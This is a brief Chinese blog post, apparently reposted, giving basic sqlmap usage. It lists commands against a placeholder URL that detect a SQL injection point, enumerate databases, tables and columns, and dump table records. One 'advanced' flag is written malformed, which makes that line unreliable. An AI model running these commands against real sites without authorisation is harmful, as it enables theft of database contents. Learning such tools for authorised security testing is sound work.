sqlmap注入工具

标签：基本   php   board   com   数据库   令行   map   sqlmap   tab   

sqlmap是sql自动注入工具。

sqlmap最基本用法：打开命令行交互界面。

1.检测是否存在注入点：sqlmap -u "ww.xxx.com/test.php?id=1"

2.检测数据库名：sqlmap -u "ww.xxx.com/test.php?id=1" --dbs

3.检测指定数据库的表名：sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库名 --tables

4.检测指定表的字段名：sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库名 -T 表名 --columns

5.检测指定表的记录：sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库 -T 表名 -C "列名1，列名2" --dump

高级用法：

sqlmap -u  "注入点"  --current -db 返回当前依赖数据库

sqlmap注入工具

标签：基本   php   board   com   数据库   令行   map   sqlmap   tab   

原文地址：https://www.cnblogs.com/PrideAssassin/p/11579232.html